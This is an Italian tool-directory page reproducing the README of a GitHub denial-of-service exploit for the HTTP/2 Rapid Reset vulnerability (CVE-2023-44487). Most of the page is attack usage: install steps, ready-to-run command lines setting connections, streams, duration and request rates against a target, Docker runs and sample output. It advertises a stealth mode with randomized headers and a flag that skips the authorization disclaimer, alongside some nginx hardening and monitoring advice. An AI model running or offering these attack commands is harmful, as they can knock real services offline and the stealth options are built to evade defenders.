Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Framework di ExploitAnalisi delle VulnerabilitàExploitSicurezza WebPenetration TestingRed TeamingAttacco Avversario
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

Vedi Repository
141 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Framework avanzato di sfruttamento della vulnerabilità HTTP/2 Rapid Reset CVE-2023-44487. Caratterizzato da attacchi concorrenti multi-connessione, controllo adattivo della velocità, modalità stealth con header casuali, metriche in tempo reale e report di valutazione del rischio. Solo per test di penetrazione autorizzati. Di Sudeepa Wanigarathna

Condividi

CVE-2023-44487 HTTP/2 DoS Rapid Reset Exploit

Professional Edition v1.0.1 | Autore: Sudeepa Wanigarathna

Python Version License Version CVSS


Indice dei contenuti

  • Panoramica
  • Dettagli della vulnerabilità
  • Caratteristiche
  • Requisiti
  • Installazione
  • Avvio rapido
  • Guida all'utilizzo
  • Opzioni di configurazione
  • Supporto Docker
  • Esempi
  • Interpretare i risultati
  • Raccomandazioni di sicurezza
  • Disclaimer legale
  • Autore
  • Changelog

  • Panoramica

    Un framework di valutazione di livello professionale per CVE-2023-44487, la vulnerabilità HTTP/2 Rapid Reset. Questo strumento aiuta i professionisti della sicurezza a testare e validare i sistemi contro una delle condizioni DoS HTTP/2 più impattanti divulgate negli ultimi anni.

    Dimostra come la creazione e il reset rapidi di stream HTTP/2 possano esaurire le risorse del server e portare a condizioni di Denial of Service (DoS).

    Caratteristiche principali in sintesi

    • Motore di attacco multi-connessione — Connessioni HTTP/2 concorrenti
    • Controllo adattivo della velocità — Regolazione dinamica per la massima efficacia
    • Modalità stealth — Header randomizzati e rotazione delle connessioni
    • Report completi — JSON/CSV con valutazione del rischio
    • Supporto Docker — Distribuzione containerizzata
    • Monitoraggio in tempo reale — Metriche di attacco live e avanzamento
    • Logging professionale — Output console colorato con logging su file
    UsoRisultati

    Dettagli della vulnerabilità

    CVE-2023-44487: attacco HTTP/2 Rapid Reset

    AttributoValore
    ID CVECVE-2023-44487
    Punteggio CVSS7.5 (Alto)
    Vettore di attaccoRete
    Complessità dell'attaccoBassa
    ImpattoDenial of Service (Esaurimento delle risorse)
    Protocolli interessatiHTTP/2
    Data di divulgazioneOttobre 2023

    Panoramica tecnica

    La vulnerabilità sfrutta il meccanismo di gestione degli stream del protocollo HTTP/2:

    1. Creazione dello stream — Il client invia un frame HEADERS per creare un nuovo stream
    2. Reset immediato — Il client invia immediatamente un frame RST_STREAM
    3. Elaborazione lato server — Il server deve elaborare entrambi i frame, consumando risorse
    4. Esaurimento delle risorse — I cicli ripetuti sopraffanno le risorse del server

    Impatto

    • Esaurimento delle risorse sui server HTTP/2
    • Possibile Denial of Service (DoS)
    • Può colpire load balancer, proxy e CDN
    • Non richiede autenticazione o privilegi speciali

    Caratteristiche

    Funzionalità principali

    FunzionalitàDescrizione
    Supporto HTTP/2Implementazione completa del protocollo HTTP/2 tramite la libreria h2
    Multi-connessioneAttacco concorrente su più connessioni
    SSL/TLSSupporto HTTPS con opzioni di verifica dei certificati
    Controllo adattivo della velocitàRegola dinamicamente la velocità di attacco in base alla risposta del server
    Modalità stealthHeader randomizzati e rotazione delle connessioni
    Monitoraggio in tempo realeVisualizzazione delle metriche live durante l'esecuzione
    Report completiOutput JSON/CSV con valutazione del rischio
    Supporto DockerDistribuzione containerizzata per test semplificati

    Funzionalità avanzate

    • Supporto proxy — Configurazione proxy estendibile
    • Connection pooling — Gestione efficiente delle connessioni
    • Recupero dagli errori — Gestione pulita dei fallimenti di connessione
    • Ottimizzazione delle prestazioni — Impostazioni configurabili per diversi scenari
    • Integrazione CI/CD — Adatto al testing di sicurezza automatizzato

    Requisiti

    Requisiti di sistema

    ComponenteMinimoConsigliato
    Sistema operativoLinux / macOS / WindowsLinux o macOS
    Python3.7+3.11+
    CPU2 core4+ core
    RAM2GB4GB+
    Rete100Mbps1Gbps+

    Dipendenze

    root@kitploit:~
    h2>=4.1.0,<5.0.0
    aiohttp>=3.8.0,<4.0.0
    

    Installazione

    1. Installazione rapida

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    
    # Install dependencies
    pip install -r requirements.txt
    
    # Verify installation
    python3 cve-2023-44487-exploit.py --help
    

    2. Ambiente virtuale (consigliato)

    root@kitploit:~
    # Create virtual environment
    python3 -m venv venv
    
    # Activate virtual environment
    # On Linux/macOS:
    source venv/bin/activate
    # On Windows:
    venv\Scripts\activate
    
    # Install dependencies
    pip install -r requirements.txt
    

    3. Installazione Docker

    root@kitploit:~
    # Build Docker image
    docker build -t cve-2023-44487-exploit .
    
    # Run with Docker
    docker run --rm cve-2023-44487-exploit target.com
    

    4. Installazione manuale

    root@kitploit:~
    # Install without requirements.txt
    pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
    
    # Download the exploit
    wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
    
    # Make executable
    chmod +x cve-2023-44487-exploit.py
    

    Avvio rapido

    Utilizzo di base

    root@kitploit:~
    # Simple run with default settings
    python3 cve-2023-44487-exploit.py example.com
    
    # Test HTTPS on port 443
    python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
    
    # Test HTTP on port 80
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    

    Test rapido (5 secondi)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    Valutazione completa (60 secondi)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
    

    Guida all'utilizzo

    Opzioni della riga di comando

    Configurazione del target

    OpzioneDescrizionePredefinito
    hostHostname o IP del targetObbligatorio
    -p, --portPorta del target443
    --no-sslDisabilita SSL/TLSFalse
    --no-verifySalta la verifica SSLFalse

    Configurazione dell'attacco

    OpzioneDescrizionePredefinito
    -c, --connectionsNumero di connessioni concorrenti50
    -s, --streamsStream per connessione1000
    -d, --durationDurata in secondi30
    --max-streamsNumero massimo totale di stream100000
    --delayRitardo base tra le operazioni0.0001s

    Opzioni avanzate

    OpzioneDescrizionePredefinito
    --adaptiveControllo adattivo della velocitàTrue
    --target-rpsRichieste target al secondo10000
    --stealthModalità stealth (header randomizzati)False
    --skip-validationSalta la validazione del targetFalse
    --forceSalta il prompt di disclaimer legaleFalse

    Report

    OpzioneDescrizionePredefinito
    -o, --outputNome del file di outputexploit_results.json
    --formatFormato di output (json / csv / console)json
    -v, --verboseLogging dettagliatoFalse

    Opzioni di configurazione

    Usa i flag CLI sopra indicati per regolare concorrenza, volume degli stream, durata e report. Preferisci valori -c / -s / -d più bassi per la validazione iniziale, quindi scala solo su sistemi che sei autorizzato a stress-testare.

    ScenarioFlag suggeriti
    Smoke test-c 10 -s 100 -d 5
    Valutazione standard-c 50 -s 1000 -d 30
    Test di laboratorio ad alto carico-c 100 -s 2000 -d 60 --stealth
    Certificato non attendibile--no-verify
    HTTP semplice-p 80 --no-ssl

    Supporto Docker

    Creare l'immagine

    root@kitploit:~
    docker build -t cve-2023-44487-exploit .
    

    Eseguire una valutazione di base

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com
    

    Eseguire con parametri personalizzati

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
    

    Salvare i risultati in locale

    root@kitploit:~
    docker run --rm -v "$(pwd)/results:/app/results" \
      cve-2023-44487-exploit target.com -o /app/results/report.json
    

    Modalità interattiva

    root@kitploit:~
    docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
    

    Docker Compose

    root@kitploit:~
    # Start with docker-compose
    docker-compose up
    
    # Run with a custom command
    docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
    

    Esempi

    1. Valutazione HTTPS di base

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
    

    2. Valutazione HTTP (senza SSL)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
    

    3. Esecuzione di laboratorio ad alte prestazioni

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
    

    4. Modalità stealth

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
    

    5. Test di validazione rapido

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    6. Generare un report CSV

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
    

    7. Saltare la validazione

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
    

    8. Test di produzione autorizzato

    root@kitploit:~
    python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
      -c 100 -s 2000 -d 60 --stealth -o full_report.json
    

    Interpretare i risultati

    Metriche di output

    MetricaDescrizioneInterpretazione
    Stream totaliNumero di stream creatiConteggio più alto = maggiore carico generato
    Reset riuscitiStream resettati con successoTipicamente >90% su target vulnerabili
    Velocità di reset (RPS)Reset al secondoVelocità più alta = carico più efficace
    Tasso di successoPercentuale di reset riusciti>90% indica spesso esposizione
    Errori di connessioneConnessioni falliteBasso = connettività stabile
    Reset del serverReset iniziati dal serverAlto = presenti misure protettive

    Livelli di valutazione del rischio

    LivelloPunteggioSignificato
    CRITICO80–100Server altamente vulnerabile
    ALTO60–79Server vulnerabile, con qualche protezione
    MEDIO40–59Presente una certa protezione
    BASSO0–39Server ben protetto

    Esempio di output

    root@kitploit:~
    ================================================================================
    EXPLOIT EXECUTION SUMMARY
    ================================================================================
    Target: target.com:443
    Duration: 30.00s
    Total Streams: 15,234
    Successful Resets: 15,198
    Reset Rate: 506.6/s
    Success Rate: 99.76%
    Connection Errors: 0
    --------------------------------------------------------------------------------
    RISK ASSESSMENT
    --------------------------------------------------------------------------------
    Risk Level: CRITICAL
    Risk Score: 95/100
    Factors:
      - Extremely high reset rate accepted
      - Very high success rate
    ================================================================================
    

    Raccomandazioni di sicurezza

    Per gli amministratori di sistema

    Azioni immediate

    1. Applicare le patch di sicurezza

      • Aggiornare alle ultime implementazioni HTTP/2
      • Applicare le patch di sicurezza specifiche del fornitore
      • Aggiornare load balancer e proxy
    2. Implementare il rate limiting

      root@kitploit:~
      # Nginx rate limiting example
      http {
          limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
          limit_req zone=http2 burst=20 nodelay;
      }
      
    3. Limiti di connessione

      root@kitploit:~
      # Limit connections per client
      limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
      limit_conn conn_zone 10;
      

    Indurimento della configurazione

    ImpostazioneRaccomandazione
    Stream concorrenti massimiImpostare a 100–200 per connessione
    Velocità di reset degli streamLimitare a <100/sec per client
    Limite di connessioniMassimo 50–100 connessioni per IP
    Valori di timeoutRidurre i timeout di inattività
    Limiti di dimensione delle richiesteLimitare le dimensioni degli header e il payload

    Monitoraggio

    root@kitploit:~
    # Monitor HTTP/2 connections
    netstat -an | grep 443 | grep ESTABLISHED | wc -l
    
    # Monitor reset-related log entries (example)
    grep "RST_STREAM" /var/log/nginx/error.log | wc -l
    

    Controlli di sicurezza consigliati

    • Rate limiting — Implementare limiti di stream per client
    • Throttling delle connessioni — Limitare le connessioni per IP
    • Limiti delle risorse — Impostare i valori di timeout delle connessioni
    • Monitoraggio — Abilitare logging e avvisi per le anomalie
    • Regole WAF — Implementare regole WAF specifiche per HTTP/2
    • Gestione delle patch — Aggiornamenti di sicurezza regolari
    • Risposta agli incidenti — Avere un piano per gli attacchi DoS

    Disclaimer legale

    IMPORTANTE: LEGGERE ATTENTAMENTE PRIMA DI UTILIZZARE QUESTO STRUMENTO

    Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi.

    Termini di utilizzo

    Utilizzando questo strumento, riconosci e accetti che:

    1. Hai l'autorizzazione scritta esplicita per testare il sistema target
    2. Comprendi i rischi e il potenziale impatto di questa valutazione
    3. Rispetterai tutte le leggi e i regolamenti applicabili
    4. Accetti la piena responsabilità per le tue azioni
    5. Non utilizzerai questo strumento per attività non autorizzate

    Utilizzi proibiti

    Questo strumento NON deve essere utilizzato per:

    • Test o attacchi non autorizzati
    • Denial of service contro sistemi che non possiedi o per i quali non hai il permesso di testare
    • Interrompere sistemi di produzione senza autorizzazione
    • Causare danni finanziari
    • Qualsiasi attività illegale

    Dichiarazione di responsabilità

    L'AUTORE E I COLLABORATORI FORNISCONO QUESTO STRUMENTO "COSÌ COM'È" SENZA ALCUNA GARANZIA. L'USO DI QUESTO STRUMENTO È A TUO RISCHIO. L'AUTORE NON È RESPONSABILE PER DANNI O PROBLEMI LEGALI DERIVANTI DALL'USO DI QUESTO STRUMENTO.

    L'uso non autorizzato di questo strumento può violare leggi, tra cui, a titolo esemplificativo e non esaustivo:

    • Computer Fraud and Abuse Act (CFAA) — USA
    • Computer Misuse Act — Regno Unito
    • Regolamento generale sulla protezione dei dati (GDPR) — UE
    • Altre leggi locali, nazionali e internazionali pertinenti

    Autore

    Sudeepa Wanigarathna

    • Ricercatore di sicurezza e penetration tester
    • Specializzato in sicurezza applicativa e vulnerabilità dei protocolli
    • GitHub
    • LinkedIn

    Changelog

    Versione 1.0.1 (corrente)

    • Corretto l'errore dell'attributo connection_attempts
    • Migliorata la validazione SSL/ALPN
    • Aggiunta la gestione dei timeout
    • Migliorato il recupero dagli errori
    • Aggiunto il flag --skip-validation
    • Migliorato il supporto Docker

    Versione 1.0.0 (iniziale)

    • Prima release dell'edizione professionale
    • Motore di attacco multi-connessione
    • Controllo adattivo della velocità
    • Modalità stealth
    • Report completi
    • Supporto Docker

    Licenza

    Questo progetto è concesso in licenza MIT — consulta il file LICENSE per i dettagli.


    Riconoscimenti

    • Team del protocollo HTTP/2
    • Ricercatori di sicurezza che hanno identificato CVE-2023-44487
    • Comunità open source (progetti h2, aiohttp)

    Riferimenti

    • Voce CVE-2023-44487 su NVD
    • Analisi dell'attacco HTTP/2 Rapid Reset
    • Specifica del protocollo HTTP/2 (RFC 9113)
    • Advisory di sicurezza Nginx per HTTP/2
    • Guida alla sicurezza Apache per HTTP/2

    Supporto

    Per problemi e domande:

    • GitHub Issues: Apri una segnalazione
    • Email: [email protected]
    • Contatto per la sicurezza: Se trovi una vulnerabilità in questo progetto, segnalala in modo responsabile.

    Scheda di riferimento rapido

    root@kitploit:~
    # Quick Commands
    
    # Test HTTPS (skip cert verify)
    python3 cve-2023-44487-exploit.py target.com --no-verify
    
    # Test HTTP
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    
    # Quick test (5 seconds)
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
    
    # Full assessment
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
    
    # Skip validation
    python3 cve-2023-44487-exploit.py target.com --skip-validation
    
    # Docker
    docker run --rm cve-2023-44487-exploit target.com
    
    # Help
    python3 cve-2023-44487-exploit.py --help
    

    PROMEMORIA: Ottieni sempre la dovuta autorizzazione prima di testare qualsiasi sistema. Utilizza questo strumento in modo responsabile ed etico.


    Mantenuto da Sudeepa Wanigarathna | Ultimo aggiornamento: agosto 2026

    Scarica lo strumento